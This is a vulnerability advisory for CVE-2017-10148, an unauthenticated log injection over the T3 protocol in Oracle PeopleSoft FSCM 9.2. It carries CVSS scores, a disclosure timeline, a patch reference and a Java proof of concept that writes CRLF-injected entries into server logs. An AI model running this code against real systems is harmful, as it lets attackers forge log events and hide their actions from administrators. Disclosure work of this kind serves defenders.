ERPScanERPSCAN-17-042Anonymous log injection in FSCM
5.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.003 Low
EPSS
Percentile
63.7%
Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft FSCM 9.2 Vendor:Oracle **Bug:**Anonymous log injection **Reported:**16.03.2017 **Vendor response:**17.03.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Log injection
Risk: High
Impact: Fraud log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148
CVSS Information
CVSS Base Score v3: 5.8 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | Low (L) |
| A: Impact to Availability | None (N) |
VULNERABILITY DESCRIPTION
An attacker can use a special T3 request to inject special data to log files.
VULNERABLE PACKAGES
PeopleSoft FSCM 9.2
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU July 2017.
TECHNICAL DESCRIPTION
Proof of Concept
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException { Properties p = new Properties(); p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”); p.put(Context.PROVIDER_URL, “t3://“PS_SERVER_IP+”:”+PS_SERVER_PORT); Context ctx = new InitialContext(p); Object obj = ctx.lookup(“weblogic.common.T3Services”); Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class); T3ServicesDef h = (T3ServicesDef) o; h.log().log(“ERPScan_1\n\rERPScan_2”); h.log().info(“ERPScan_3\n\rERPScan_4”); h.log().error(“ERPScan_5\n\rERPScan_6”); h.log().warning(“ERPScan_7\n\rERPScan_8”); h.log().debug(“ERPScan_9\n\rERPScan_10”); return false; }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”);
p.put(Context.PROVIDER_URL, “t3://“PS_SERVER_IP+”:”+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup(“weblogic.common.T3Services”);
Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
T3ServicesDef h = (T3ServicesDef) o;
h.log().log(“ERPScan_1\n\rERPScan_2”);
h.log().info(“ERPScan_3\n\rERPScan_4”);
h.log().error(“ERPScan_5\n\rERPScan_6”);
h.log().warning(“ERPScan_7\n\rERPScan_8”);
h.log().debug(“ERPScan_9\n\rERPScan_10”);
return false;
}
—|—
Related
5.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.003 Low
EPSS
Percentile
63.7%